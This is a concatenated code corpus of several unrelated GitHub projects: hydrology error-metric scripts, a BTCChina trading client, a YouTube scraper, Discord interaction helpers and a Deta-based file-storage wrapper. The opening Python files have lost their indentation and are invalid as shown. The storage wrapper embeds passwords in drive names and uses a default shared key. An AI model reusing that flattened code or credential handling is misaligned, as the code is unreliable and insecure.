print("RMSE value : ", rmse)
def storeErrorValuesIntoCSVFileByInterpolation(ref, modelname, site_name, periodNumber, simulatedDuration, mea, mre, rmse, startTime, endTime):
simuRepo = getPathToSimulationDirectoryFromModelname(modelname, site_name)
nbPart = str(startTime) + "_" + str(endTime)
if (periodNumber == startTime):
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult_interpolation_' + str(nbPart) + '.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['Period Number', 'Simulated Time', 'MAE', 'MRE', 'RMSE'])
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
else:
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult_interpolation_' + str(nbPart) + '.csv', 'a') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("-------------------------")
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
def computeErrorRatesFromModelnamesByInterpoliationOptiParalFixedInit(ref, modelname, site_number, startTime, endTime, timestep):
site_name = getSiteNameFromSiteNumber(site_number)
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
print(repoRef)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
refTimes = refHds.get_times()
refKstpkper = refHds.get_kstpkper()
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
simuKstpkper = simuHds.get_kstpkper()
    # For each day
for day in range(startTime, endTime+1):
print(day)
        # Retrieve the head matrix from the reference simulation
refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
        # Retrieve the simulation head matrix for the upper bound
print(simuTimes[nbPeriod], day+1)
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = day
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
mae = 0
mre = 0
rmse = 0
for nrow in range(refHead.shape[1]):
for ncol in range(refHead.shape[2]):
ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, refHead.shape[0])
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, refHead.shape[0])
ajoutSimu = (se - ss) / duree
r= getNonDryCellHdsValue(refHead, nrow, ncol,refHead.shape[0])
s = ss + (ajoutSimu * pas)
mae, mre, rmse = addValueToErrorIndicators(s, r, mae, mre, rmse)
sizeHeads = refHead.shape[1] * refHead.shape[2]
mae = mae / (sizeHeads)
rmse = math.sqrt(rmse / sizeHeads)
storeErrorValuesIntoCSVFileByInterpolation(ref, modelname, site_name, day, refTimes[day], mae, mre, rmse, startTime, endTime)
def addValueToErrorIndicators(s, r, mae, mre, rmse):
diff = (s - r)
mae += abs(diff)
mre += abs(diff / max(1, (s + r)/2))
rmse += diff**2
return mae, mre, rmse
# def getSeaLvl():
# sites = pd.read_csv(mainAppRepo + "data/study_sites.txt", sep='\s+', header=0, index_col=0)
# port = int(sites._get_values[site_number,5])
# ram = pd.read_table(mainAppRepo +"data/RAM.csv", delimiter=";", header=0)
# sea_level = ram.NM_IGN[port-1]
# return sea_level
if __name__ == '__main__':
computeErrorRatesFromModelnamesByInterpoliationOptiParalFixedInit(refname, modelname, site_number, startTime, endTime, timestep)
```
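The per-cell accumulation in `addValueToErrorIndicators` feeds the MAE/MRE/RMSE values written to the CSV files above. A small, hedged check with invented head values follows; it assumes the module is importable as `Indicator_variantes` (its own dependencies such as flopy must be available).

```python
import math
# Assumed import path; head values are invented (simulated, reference) pairs.
from Indicator_variantes import addValueToErrorIndicators

mae = mre = rmse = 0
pairs = [(2.0, 1.5), (3.0, 3.2)]
for s, r in pairs:
    mae, mre, rmse = addValueToErrorIndicators(s, r, mae, mre, rmse)

n = len(pairs)
print(mae / n)              # mean absolute error ~ 0.35
print(math.sqrt(rmse / n))  # RMSE ~ 0.38
```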
#### File: Scripts4WaterFlowExp/src/watertab.py
```python
import sys, os
import pandas as pd
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'vtk_export_watertable'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'custom_utils'))
from custom_utils import helpers as utils
from vtk_export_watertable import vtk_export_watertable as vtk_watertable
def get_model_name(site_number, chronicle, approx, rate, ref):
model_name = "model_time_0_geo_0_thick_1_K_86.4_Sy_0.1_Step1_site" + str(site_number) + "_Chronicle" + str(chronicle)
if not ref:
model_name += "_Approx" + str(approx)
if approx == 0:
model_name += "_Period" + str(rate)
elif approx==1:
model_name += "_RechThreshold" + str(rate)
return model_name
def watertab(site, chronicle, approx, rate, ref, folder):
folder_path = os.path.dirname(os.path.abspath(__file__)) + '/'
sites = pd.read_table(folder_path + "data/study_sites.txt", sep=',', header=0, index_col=0)
model_name = get_model_name(site, chronicle, approx, rate, ref)
site_name = sites.index._data[site]
mainRepo = folder + '/' + site_name + '/' + model_name + '/'
coordinates = sites._get_values[site,1:5]
vtk_watertable(modelname=model_name, modelfolder=mainRepo, coord=coordinates)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-site", "--site", type=int, help= "2: Agon-Coutainville or 3:Saint-Germain-Sur-Ay", required=True)
parser.add_argument("-approx", "--approximation", type=int, required=True)
parser.add_argument("-chr", "--chronicle", type=int)
parser.add_argument("-rate", "--rate", type=float, required=False)
parser.add_argument("-f", "--folder", type=str, required=True)
parser.add_argument("-ref", "--ref", action='store_true')
args = parser.parse_args()
site = args.site
chronicle = args.chronicle
folder= args.folder
approx = args.approximation
chronicle = args.chronicle
rate = args.rate
ref = args.ref
watertab(site, chronicle, approx, rate, ref, folder)
``` |
{
"source": "jnslmk/CryptoBot",
"score": 3
} |
#### File: CryptoBot/app/btcchina.py
```python
import time
import re
import hmac
import hashlib
import base64
import http.client
import json
class BTCChina:
def __init__(self, access=None, secret=None):
self.access_key = access
self.secret_key = secret
self.conn = None
self._make_connection()
def _make_connection(self):
if self.conn:
self.conn.close()
self.conn = http.client.HTTPSConnection("api.btcchina.com")
def _get_tonce(self):
return int(time.time() * 1000000)
def _get_params_hash(self, pdict):
pstring = ""
# The order of params is critical for calculating a correct hash
fields = ['tonce', 'accesskey', 'requestmethod', 'id', 'method', 'params']
for f in fields:
if pdict[f]:
if f == 'params':
# Convert list to string, then strip brackets and spaces
# probably a cleaner way to do this
param_string = re.sub("[\[\] ]", "", str(pdict[f]))
param_string = re.sub("'", '', param_string)
param_string = re.sub("True", '1', param_string)
param_string = re.sub("False", '', param_string)
param_string = re.sub("None", '', param_string)
pstring += f + '=' + param_string + '&'
else:
pstring += f + '=' + str(pdict[f]) + '&'
else:
pstring += f + '=&'
pstring = pstring.strip('&')
# now with correctly ordered param string, calculate hash
        # hmac in Python 3 requires bytes, so encode both the secret key and the param string
        phash = hmac.new(self.secret_key.encode(), pstring.encode(), hashlib.sha1).hexdigest()
return phash
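    # Hedged illustration (values are made up, not from the original file): for a
    # getAccountInfo request the string that gets signed looks like
    #   "tonce=1650000000000000&accesskey=MY_ACCESS_KEY&requestmethod=post&id=1650000000000000&method=getAccountInfo&params="
    # before being HMAC-SHA1 signed with the secret key.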
def _private_request(self, post_data):
# fill in common post_data parameters
tonce = self._get_tonce()
post_data['tonce'] = tonce
post_data['accesskey'] = self.access_key
post_data['requestmethod'] = 'post'
# If ID is not passed as a key of post_data, just use tonce
if not 'id' in post_data:
post_data['id'] = tonce
pd_hash = self._get_params_hash(post_data)
# must use b64 encode
        # base64.b64encode works on bytes in Python 3, so encode before and decode after
        auth_string = 'Basic ' + base64.b64encode((self.access_key + ':' + pd_hash).encode()).decode()
headers = {'Authorization': auth_string, 'Json-Rpc-Tonce': tonce}
# post_data dictionary passed as JSON
try:
self.conn.request("POST", '/api_trade_v1.php', json.dumps(post_data), headers)
response = self.conn.getresponse()
except Exception as e:
print("[btcchina.py] ***!!! Exception with httplib. Will reconnect.")
self._make_connection()
raise
else:
# check response code, ID, and existence of 'result' or 'error'
# before passing a dict of results
if response.status == 200:
# this might fail if non-json data is returned
resp_dict = json.loads(response.read())
# The id's may need to be used by the calling application,
# but for now, check and discard from the return dict
if str(resp_dict['id']) == str(post_data['id']):
if 'result' in resp_dict:
return resp_dict['result']
elif 'error' in resp_dict:
return resp_dict
else:
# not great error handling....
print("status:", response.status)
print("reason:", response.reason)
return None
def get_account_info(self, post_data={}):
post_data['method'] = 'getAccountInfo'
post_data['params'] = []
return self._private_request(post_data)
def get_market_depth2(self, limit=10, market="btccny", post_data={}):
post_data['method'] = 'getMarketDepth2'
post_data['params'] = [limit, market]
return self._private_request(post_data)
def buy(self, price, amount, market="btccny", post_data={}):
amountStr = "{0:.4f}".format(round(amount, 4))
post_data['method'] = 'buyOrder2'
        if price is None:
priceStr = None
else:
priceStr = "{0:.4f}".format(round(price, 4))
post_data['params'] = [priceStr, amountStr, market]
return self._private_request(post_data)
def sell(self, price, amount, market="btccny", post_data={}):
amountStr = "{0:.4f}".format(round(amount, 4))
post_data['method'] = 'sellOrder2'
        if price is None:
priceStr = None
else:
priceStr = "{0:.4f}".format(round(price, 4))
post_data['params'] = [priceStr, amountStr, market]
return self._private_request(post_data)
def cancel(self, order_id, market="btccny", post_data={}):
post_data['method'] = 'cancelOrder'
post_data['params'] = [order_id, market]
return self._private_request(post_data)
def request_withdrawal(self, currency, amount, post_data={}):
post_data['method'] = 'requestWithdrawal'
post_data['params'] = [currency, amount]
return self._private_request(post_data)
def get_deposits(self, currency='BTC', pending=True, post_data={}):
post_data['method'] = 'getDeposits'
post_data['params'] = [currency, pending]
return self._private_request(post_data)
def get_orders(self, id=None, open_only=True, market="btccny", details=True, post_data={}):
# this combines getOrder and getOrders
if id is None:
post_data['method'] = 'getOrders'
post_data['params'] = [open_only, market]
else:
post_data['method'] = 'getOrder'
post_data['params'] = [id, market, details]
return self._private_request(post_data)
def get_withdrawals(self, id='BTC', pending=True, post_data={}):
# this combines getWithdrawal and getWithdrawals
try:
id = int(id)
post_data['method'] = 'getWithdrawal'
post_data['params'] = [id]
        except (ValueError, TypeError):
post_data['method'] = 'getWithdrawals'
post_data['params'] = [id, pending]
return self._private_request(post_data)
def get_transactions(self, trans_type='all', limit=10, post_data={}):
post_data['method'] = 'getTransactions'
post_data['params'] = [trans_type, limit]
return self._private_request(post_data)
def get_archived_order(self, id, market='btccny', withdetail=False, post_data={}):
post_data['method'] = 'getArchivedOrder'
post_data['params'] = [id, market, withdetail]
return self._private_request(post_data)
def get_archived_orders(self, market='btccny', limit=200, less_than_order_id=0, withdetail=False, post_data={}):
post_data['method'] = 'getArchivedOrders'
post_data['params'] = [market, limit, less_than_order_id, withdetail]
return self._private_request(post_data)
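# Hedged usage sketch (not part of the original file; credentials and amounts are placeholders,
# and the exchange API must still be reachable for these calls to succeed):
#
#   client = BTCChina(access='YOUR_ACCESS_KEY', secret='YOUR_SECRET_KEY')
#   print(client.get_account_info())
#   print(client.get_market_depth2(limit=5))
#   client.buy(100.0, 0.01)   # limit buy: 0.01 BTC at 100.0 CNY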
``` |
{
"source": "jnsougata/AioTube",
"score": 3
} |
#### File: src/aiotube/live.py
```python
from .video import Video
from ._threads import _Thread
from ._http import _get_video_data
from ._rgxs import _VideoPatterns as rgx
class Live(Video):
def __init__(self, video_id: str):
super().__init__(video_id)
@property
def duration(self) -> float:
return 0.0
@property
def streamed(self) -> bool:
return True
@property
def info(self) -> dict:
"""
:return: dict containing the whole info of the video
"""
raw = _get_video_data(self._id)
def _get_data(pattern):
data = pattern.findall(raw)
return data[0] if len(data) > 0 else None
patterns = [
rgx.title, rgx.views, rgx.likes, rgx.duration, rgx.author_id,
rgx.upload_date, rgx.thumbnail, rgx.tags, rgx.description
]
data = _Thread.run(_get_data, patterns)
return {
'title': data[0],
'id': self._id,
'views': data[1][:-6] if data[1] else None,
'likes': data[2],
'duration': self.duration,
'author': data[4],
'upload_date': data[5],
'url': self._url,
'thumbnail': data[6],
            'tags': data[7].split(',') if data[7] else None,
'description': data[8].replace('\\n', '\n') if data[8] else None,
'streamed': self.streamed,
}
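# Hedged usage sketch (the video id below is a placeholder, not from the original file;
# it also requires network access):
#
#   live = Live('dQw4w9WgXcQ')
#   print(live.info['title'], live.streamed)   # duration is always reported as 0.0 for live streams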
```
#### File: src/aiotube/playlist.py
```python
from ._threads import _Thread
from .utils import filter
from .videobulk import _VideoBulk
from ._http import _get_playlist_data
from ._rgxs import _PlaylistPatterns as rgx
from typing import List, Optional, Dict, Any
class Playlist:
__HEAD = 'https://www.youtube.com/playlist?list='
def __init__(self, playlist_id: str):
"""
:param str playlist_id: the _id of the playlist
"""
if 'youtube.com' in playlist_id:
self.id = playlist_id.split('list=')[-1]
else:
self.id = playlist_id
self.__playlist_data = _get_playlist_data(self.id)
def __repr__(self):
return f'<Playlist {self.url}>'
@property
def name(self) -> Optional[str]:
"""
:return: the name of the playlist
"""
names = rgx.name.findall(self.__playlist_data)
return names[0] if names else None
@property
def url(self) -> Optional[str]:
"""
:return: url of the playlist
"""
return f'https://www.youtube.com/playlist?list={self.id}'
@property
def video_count(self) -> Optional[str]:
"""
:return: total number of videos in that playlist
"""
video_count = rgx.video_count.findall(self.__playlist_data)
return video_count[0] if video_count else None
@property
def videos(self) -> _VideoBulk:
"""
:return: list of < video objects > for each video in the playlist (consider limit)
"""
videos = rgx.video_id.findall(self.__playlist_data)
return _VideoBulk(filter(iterable=videos))
@property
def thumbnail(self) -> Optional[str]:
"""
:return: url of the thumbnail of the playlist
"""
thumbnails = rgx.thumbnail.findall(self.__playlist_data)
return thumbnails[0] if thumbnails else None
@property
def info(self) -> Dict[str, Any]:
"""
:return: a dict containing playlist info
"""
def _get_data(pattern):
data = pattern.findall(self.__playlist_data)
return data[0] if data else None
patterns = [rgx.name, rgx.video_count, rgx.thumbnail]
data = _Thread.run(_get_data, patterns)
return {
'name': data[0],
'video_count': data[1],
            'videos': filter(iterable=rgx.video_id.findall(self.__playlist_data)),
'url': self.__HEAD + self.id,
'thumbnail': data[2]
}
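# Hedged usage sketch (the playlist url is a placeholder, not from the original file):
#
#   playlist = Playlist('https://www.youtube.com/playlist?list=PLxxxxxxxxxxxxxxxx')
#   print(playlist.name, playlist.video_count)
#   bulk = playlist.videos   # _VideoBulk wrapping the video ids contained in the playlist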
```
#### File: src/aiotube/videobulk.py
```python
from ._http import _get_video_data
from ._threads import _Thread
from ._rgxs import _VideoPatterns as rgx
from typing import List, Optional, Dict, Any
class _VideoBulk:
def __init__(self, iterable: list):
self._video_ids = iterable
self.__source_data = self.__fetch_all
@property
def __fetch_all(self):
def fetch_bulk_source(video_id):
return _get_video_data(video_id)
return _Thread.run(fetch_bulk_source, self._video_ids)
@staticmethod
def _get_info(source: str) -> Dict[str, Any]:
"""
:return: dict containing the whole info of the video
"""
def _get_data(pattern):
data = pattern.findall(source)
return data[0] if data else None
patterns = [
rgx.title, rgx.views, rgx.likes, rgx.duration, rgx.author_id,
rgx.upload_date, rgx.thumbnail, rgx.tags, rgx.description,
rgx.is_streamed, rgx.is_premiered, rgx.video_id
]
data = _Thread.run(_get_data, patterns)
return {
'title': data[0],
'id': data[11],
'views': data[1][:-6] if data[1] else None,
'likes': data[2],
'duration': int(data[3]) / 1000 if data[3] else None,
'author': data[4],
'upload_date': data[5],
'url': f'https://www.youtube.com/watch?v={data[11]}',
'thumbnail': data[6],
            'tags': data[7].split(',') if data[7] else None,
'streamed': True if data[9] else False,
'premiered': True if data[10] else False,
'description': data[8].replace('\\n', '\n') if data[8] else None,
}
def _gen_bulk(self) -> Dict[str, Dict[str, Any]]:
bulk = {}
for src in self.__source_data:
__info__ = self._get_info(src)
__id__ = __info__['id']
bulk[__id__] = __info__
return bulk
``` |
{
"source": "jnsougata/app_util",
"score": 2
} |
#### File: src/app_util/app.py
```python
import json
import discord
from .modal import Modal
from discord.utils import MISSING
from discord.http import Route
from .enums import ApplicationCommandType, PermissionType
from typing import Optional, Any, Union, Sequence, Iterable, NamedTuple, List, Dict
class ApplicationCommandOrigin:
def __init__(self, name: str, command_type: ApplicationCommandType):
self.name = name
self.type = command_type
if self.type is ApplicationCommandType.MESSAGE:
self._qual = '__MESSAGE__' + name # name for mapping
elif self.type is ApplicationCommandType.USER:
self._qual = '__USER__' + name # name for mapping
elif self.type is ApplicationCommandType.CHAT_INPUT:
self._qual = '__CHAT__' + name
class Overwrite:
def __init__(self, data: Dict[str, Any]):
self.__data = data
@classmethod
def for_role(cls, role_id: int, *, allow: bool = True):
return cls({'id': str(role_id), 'type': PermissionType.ROLE.value, 'permission': allow})
@classmethod
def for_user(cls, user_id: int, *, allow: bool = True):
return cls({'id': str(user_id), 'type': PermissionType.USER.value, 'permission': allow})
@classmethod
def for_channel(cls, channel_id: int, *, allow: bool = True):
return cls({'id': str(channel_id), 'type': PermissionType.CHANNEL.value, 'permission': allow})
def to_dict(self) -> Dict[str, Any]:
return self.__data
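# Hedged usage sketch (ids are placeholders): building permission overwrites for a command.
#
#   allow_mods = Overwrite.for_role(123456789012345678, allow=True)
#   block_user = Overwrite.for_user(987654321098765432, allow=False)
#   payload = [allow_mods.to_dict(), block_user.to_dict()]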
# send / edit parameter handlers
def _handle_edit_params(
*,
content: Optional[str] = MISSING,
embed: Optional[discord.Embed] = MISSING,
embeds: List[discord.Embed] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: List[discord.ui.View] = MISSING,
file: Optional[discord.File] = MISSING,
files: List[discord.File] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
):
payload: Dict[str, Any] = {}
if content is not MISSING:
if content is not None:
payload['content'] = str(content) # type: ignore
else:
payload['content'] = None
if embed is not MISSING:
if embed is None:
payload['embeds'] = []
else:
payload['embeds'] = [embed.to_dict()]
elif embeds is not MISSING:
if len(embeds) > 10:
raise discord.errors.InvalidArgument('A message can have at most 10 embeds.')
payload['embeds'] = [e.to_dict() for e in embeds]
if allowed_mentions is MISSING:
payload['allowed_mentions'] = None # type: ignore
else:
payload['allowed_mentions'] = allowed_mentions.to_dict()
if view is not MISSING:
if view:
payload['components'] = view.to_components()
else:
payload['components'] = []
elif views is not MISSING:
container = []
_all = [v.to_components() for v in views]
for components in _all:
container.extend(components)
payload['components'] = container
if file is not MISSING:
fs = [file]
elif files is not MISSING:
fs = files
else:
fs = []
form = []
if len(fs) == 1:
file_ = fs[0]
form.append(
{
'name': 'file', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream'
}
)
else:
for index, file_ in enumerate(fs):
form.append(
{
'name': f'file{index}', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
return payload, form
def _handle_send_prams(
*,
content: Optional[Union[str, Any]] = MISSING,
tts: bool = False,
ephemeral: bool = False,
file: Optional[discord.File] = None,
files: Sequence[discord.File] = None,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[Optional[discord.Embed]]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None,
):
if files and file:
raise TypeError('Cannot mix file and files keyword arguments.')
if embeds and embed:
raise TypeError('Cannot mix embed and embeds keyword arguments.')
if views and view:
raise TypeError('Cannot mix view and views keyword arguments.')
payload = {}
if tts:
payload['tts'] = tts
if content is not MISSING:
payload['content'] = str(content)
if embed:
payload['embeds'] = [embed.to_dict()]
elif embeds:
if len(embeds) > 10:
raise discord.errors.InvalidArgument('embeds has a maximum of 10 elements.')
payload['embeds'] = [embed.to_dict() for embed in embeds]
if allowed_mentions:
payload['allowed_mentions'] = allowed_mentions
if view:
payload['components'] = view.to_components()
elif views:
container = []
action_rows = [view.to_components() for view in views]
for row in action_rows:
container.extend(row)
payload['components'] = container
if ephemeral:
payload['flags'] = 64
if file:
fs = [file]
elif files:
fs = files
else:
fs = []
form = []
if len(fs) == 1:
file_ = fs[0]
form.append(
{
'name': 'file', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
else:
for index, file_ in enumerate(fs):
form.append(
{
'name': f'file{index}', 'value': file_.fp, 'filename': file_.filename,
'content_type': 'application/octet-stream',
}
)
return payload, form
class Adapter:
def __init__(self, interaction: discord.Interaction):
self.ia = interaction
self.id = interaction.id
self.token = interaction.token
self.client = interaction.client
self.application_id = interaction.application_id
async def original_message(self):
return await self.ia.original_message()
async def post_modal(self, *, modal: Modal):
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
await self.client.http.request(r, json=modal.to_payload())
async def post_to_delay(self, ephemeral: bool = False):
route = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
payload = {'type': 5}
if ephemeral:
payload['data'] = {'flags': 64}
await self.client.http.request(route, json=payload)
async def post_autocomplete_response(self, choices) -> None:
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
payload = {'type': 8, 'data': {'choices': [c.data for c in choices]}}
try:
await self.client.http.request(r, json=payload)
except discord.errors.NotFound:
pass
async def post_response(
self, content:
Optional[Union[str, Any]] = MISSING,
*,
tts: bool = False,
ephemeral: bool = False,
file: Optional[discord.File] = None,
files: Sequence[discord.File] = None,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[Optional[discord.Embed]]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None
):
payload, form = _handle_send_prams(
content=content, tts=tts, file=file, files=files, embed=embed, embeds=embeds,
view=view, views=views, ephemeral=ephemeral, allowed_mentions=allowed_mentions)
data = {'name': 'payload_json', 'value': json.dumps({'type': 4, 'data': payload})}
form.insert(0, data) # type: ignore
r = Route('POST', f'/interactions/{self.id}/{self.token}/callback')
await self.client.http.request(r, form=form, files=files)
message = await self.original_message()
if view:
self.client._connection.store_view(view, message.id)
if views:
for view in views:
self.client._connection.store_view(view, message.id)
async def post_followup(
self,
content: Optional[Union[str, Any]] = MISSING,
*,
tts: bool = False,
ephemeral: bool = False,
embed: Optional[discord.Embed] = None,
embeds: Optional[List[discord.Embed]] = None,
allowed_mentions: Optional[discord.AllowedMentions] = None,
file: Optional[discord.File] = None,
files: Optional[List[discord.File]] = None,
view: Optional[discord.ui.View] = None,
views: Optional[List[discord.ui.View]] = None
):
payload, form = _handle_send_prams(
content=content, tts=tts, file=file, files=files, embed=embed, embeds=embeds,
view=view, views=views, ephemeral=ephemeral, allowed_mentions=allowed_mentions)
payload['wait'] = True
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
r = Route('POST', f'/webhooks/{self.application_id}/{self.token}')
message_data = await self.client.http.request(r, form=form, files=files)
message_id = int(message_data['id'])
if view:
self.client._connection.store_view(view, message_id)
if views:
for view in views:
self.client._connection.store_view(view, message_id)
return message_data
async def patch_response(
self,
content: Optional[Union[str, Any]] = MISSING,
*,
embed: Optional[discord.Embed] = MISSING,
embeds: Optional[List[discord.Embed]] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
file: Optional[discord.File] = MISSING,
files: Optional[List[discord.File]] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: Optional[List[discord.ui.View]] = MISSING
):
payload, form = _handle_edit_params(
content=content, file=file, files=files, embed=embed,
embeds=embeds, view=view, views=views, allowed_mentions=allowed_mentions)
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
r = Route('PATCH', f'/webhooks/{self.application_id}/{self.token}/messages/@original')
message_data = await self.client.http.request(r, form=form, files=files)
message_id = int(message_data['id'])
if view is not MISSING and view is not None:
self.client._connection.store_view(view, message_id)
elif views is not MISSING and views is not None:
for v in views:
self.client._connection.store_view(v, message_id)
return message_data
async def delete_response(self):
r = Route('DELETE', f'/webhooks/{self.application_id}/{self.token}/messages/@original')
await self.client.http.request(r)
async def patch_followup(
self,
message_id: int,
*,
content: Optional[Union[str, Any]] = MISSING,
embed: Optional[discord.Embed] = MISSING,
embeds: Optional[List[discord.Embed]] = MISSING,
allowed_mentions: Optional[discord.AllowedMentions] = MISSING,
file: Optional[discord.File] = MISSING,
files: Optional[List[discord.File]] = MISSING,
view: Optional[discord.ui.View] = MISSING,
views: Optional[List[discord.ui.View]] = MISSING,
):
payload, form = _handle_edit_params(
content=content, file=file, files=files, embed=embed,
embeds=embeds, view=view, views=views, allowed_mentions=allowed_mentions)
payload['wait'] = True
data = {'name': 'payload_json', 'value': json.dumps(payload)}
form.insert(0, data) # type: ignore
route = Route('PATCH', f'/webhooks/{self.application_id}/{self.token}/messages/{message_id}')
message_data = await self.client.http.request(route, form=form, files=files)
        if view is not MISSING and view is not None:
            self.client._connection.store_view(view, message_id)
        elif views is not MISSING and views is not None:
            for v in views:
                self.client._connection.store_view(v, message_id)
return message_data
async def delete_followup_message(self, message_id: int):
r = Route('DELETE', f'/webhooks/{self.application_id}/{self.token}/messages/{message_id}')
await self.client.http.request(r)
```
#### File: src/app_util/errors.py
```python
class InvalidCog(Exception):
"""
Raised when a cog is not the correct type (app_util.Cog)
"""
def __init__(self, message: str):
super().__init__(message)
class NonCoroutine(Exception):
"""
Raised when a function is not a coroutine
"""
def __init__(self, message: str):
super().__init__(message)
class CheckFailure(Exception):
"""
Raised when a before invoke check fails
"""
def __init__(self, message: str):
super().__init__(message)
class ApplicationCommandError(Exception):
"""
Raised when an application command fails to execute
"""
def __init__(self, message: str):
super().__init__(message)
class CommandNotImplemented(Exception):
"""
Raised when a command is not implemented inside source
"""
def __init__(self, message: str):
super().__init__(message)
class CommandTypeMismatched(Exception):
"""
    Raised when a mismatch between two application command types is detected
"""
def __init__(self, message: str):
super().__init__(message)
``` |
{
"source": "jnsougata/BlackHole",
"score": 3
} |
#### File: src/airdrive/air.py
```python
import io
from .dcd import *
from .errors import *
from deta import Deta
from typing import Union
from binascii import unhexlify
from time import perf_counter
from urllib3 import PoolManager
class AirDrive:
def __init__(self, drive: Deta.Drive, silent: bool = False):
self.__drive = drive
self.__silent = silent
self.__http = PoolManager()
def __repr__(self):
return f"<AirDrive>"
def __log(self, prompt: str) -> None:
if not self.__silent:
print(prompt)
@classmethod
def create(cls, username: str, password: str, private_key: str = None, silent: bool = False):
"""
Create a new account
:param username: new username for the account
:param password: password for the account
:param private_key: https://deta.sh project key (optional)
        :param silent: if True, progress prompts will not be printed
:return: AirDrive object
"""
key = private_key if private_key else PK
if len(username) < 5:
            raise InvalidCredentials("Use at least 5 characters for the username")
if password == PK:
raise InvalidCredentials("Don't use project key as password")
if len(password) < 8:
raise InvalidCredentials("Use at least 8 characters")
if username == password:
raise InvalidCredentials("Username and password can't be the same")
try:
drive = Deta(key).Drive(f'{username}_{password}'.replace('#', '_'))
files = drive.list().get('names')
if files:
return cls.login(username, password, private_key)
if not silent:
print(f"Account ({username}) created")
drive.put(name='.air', data=b' ')
return cls(drive=drive, silent=silent)
except AssertionError:
raise InvalidToken("Used an invalid login token")
@classmethod
def login(cls, username: str, password: str, private_key: str = None, silent: bool = False):
"""
Login to an existing account
:param username: username associated the account
:param password: password associated the account
:param private_key: https://deta.sh project key (optional)
        :param silent: if True, progress prompts will not be printed
:return: AirDrive object
"""
key = private_key if private_key else PK
try:
drive = Deta(key).Drive(f'{username}_{password}')
files = drive.list().get('names')
if files:
if not silent:
print(f"Logged in as ({username})")
print('-------')
return cls(drive=drive, silent=silent)
else:
raise AccountNotFound(f"Account ({username}) doesn't exist")
except AssertionError:
raise InvalidToken("Used an invalid login token")
def files(self) -> list:
"""
:return: list of files in the account
"""
files = self.__drive.list().get('names')
try:
files.remove('.air')
return files
except ValueError:
return files
def create_folder(self, folder_name: str) -> None:
"""
Create a new folder in the drive
:param folder_name: the name of the folder to create
:return: None
"""
path = f'{folder_name}/.air'
self.__drive.put(name=path, data=b' ')
self.__log(f"[+] Created folder ({folder_name})")
def upload(
self,
remote_file_name: str,
folder_name: str = None,
local_file_path: str = None,
file_content: Union[bytes, str, io.TextIOBase, io.BufferedIOBase, io.RawIOBase] = None
) -> None:
"""
Upload a file to the drive
:param local_file_path: path to the local file
:param remote_file_name: name with which the file will be saved on the drive
:param folder_name: folder in which the file will be saved on the drive (optional)
:param file_content: content of the file to be sent (optional)
:return: None
"""
if local_file_path:
with open(local_file_path, "rb") as f:
content = f.read()
elif file_content:
content = file_content
else:
            raise InvalidFile("You must provide either (local_file_path) or (file_content)")
if folder_name:
path = f'{folder_name}/{remote_file_name}'.replace('//', '/')
else:
path = remote_file_name
self.__log(f'[↑] Uploading | {path} | ...')
timer_start = perf_counter()
self.__drive.put(name=path, data=content)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {path} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s")
def upload_from_url(
self,
url: str,
file_name: str,
folder_name: str = None
) -> bytes:
"""
Upload a file from a URL to the drive
:param url: URL from which the file content will be downloaded
:param file_name: name with which the file will be saved on the drive
:param folder_name: folder in which the file will be saved on the drive (optional)
        :return: bytes - the downloaded file content
"""
if folder_name:
path = f'{folder_name}/{file_name}'.replace('//', '/')
else:
path = file_name
timer_start = perf_counter()
try:
r = self.__http.request('GET', url)
except Exception:
raise InvalidURL("Either given URL is not valid or the file is not accessible")
